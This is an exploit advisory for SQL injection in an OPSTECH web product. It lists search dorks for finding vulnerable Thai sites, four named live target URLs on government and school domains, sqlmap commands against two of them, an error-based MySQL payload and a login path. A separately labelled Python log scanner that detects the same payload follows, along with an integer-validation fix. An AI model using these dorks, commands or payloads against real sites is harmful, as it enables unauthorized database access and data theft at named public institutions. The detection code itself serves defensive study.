Copyright © 2008 by OPSTECH Multi SQL Injection "Thailand" Tested in BackBox GNU/Linux


Exploit Information

[+] Exploit Title : Copyright © 2008 by OPSTECH Multi SQL Injection "Thailand"
[+] Author : mr.Gh0st N@0b
[+] Vendor Home: http://www.opstech.co.th/
[+] Dork : intext:Copyright © 2008 by OPSTECH All Right Reserved. site:th & use your brain
           intext:Copyright © 2008 by OPSTECH All Right Reserved.
           intext:Copyright © 2008 by OPSTECH All Right Reserved. site:go.th
[+] Tested on : BackBox 5.1, Chrome

On Target :
- http://www.htp.ac.th/plant/index.php?language=2
- http://www.thakwien.go.th/wifi/index.php?language=2
- http://www.mrv.ac.th/index.php?mod=news_page&path=news_page&id_sub=45
- http://www.janvan.go.th/index.php?mod=news_page&path=news_page&id_sub=148

[+] PoC SQL :
- sqlmap -u "http://www.htp.ac.th/plant/index.php?language=2" --dbs
- sqlmap -u "http://www.mrv.ac.th/index.php?mod=news_page&path=news_page&id_sub=45" --dbs
Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: language=2' AND (SELECT 2090 FROM(SELECT COUNT(*),CONCAT(0x7178767171,(SELECT (ELT(2090=2090,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lExY'='lExY
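
A defensive check for the two parameters listed above, as an added example that is not part of the original advisory: it scans web-server access logs for non-integer values in language and id_sub and labels requests that carry the FLOOR/RAND error-based pattern seen in the payload. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory reports as injectable; both normally carry integer ids.
NUMERIC_PARAMS = ("language", "id_sub")

# Shape of the error-based (FLOOR) technique in the advisory's payload.
ERROR_BASED = re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S)

# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /plant/index.php?language=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /plant/index.php?language=2%27%20AND%20(SELECT%202090%20FROM'
    '(SELECT%20COUNT(*),CONCAT(0x7178767171,(SELECT%20(ELT(2090=2090,1))),'
    '0x7176707171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS'
    '%20GROUP%20BY%20x)a)%20AND%20%27lExY%27=%27lExY HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /index.php?mod=news_page&path=news_page&id_sub=45%27 HTTP/1.1" 200 640',
]

def classify(value):
    """Return None for a clean integer id, else a label for the anomaly."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    if ERROR_BASED.search(value):
        return "error-based-sqli"
    return "non-numeric"

def scan(log_lines):
    """Return (client_ip, param, label) for each suspicious parameter value."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values, so encoded payloads are normalised.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for param in NUMERIC_PARAMS:
            for value in query.get(param, []):
                label = classify(value)
                if label:
                    findings.append((line.split()[0], param, label))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule used in classify() is the server-side fix: cast or validate both parameters as integers and pass them to the database through parameterized queries.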

[+] PoC local login : /index.php?mod=login&path=login



front end login




Source : [cxsecurity.com]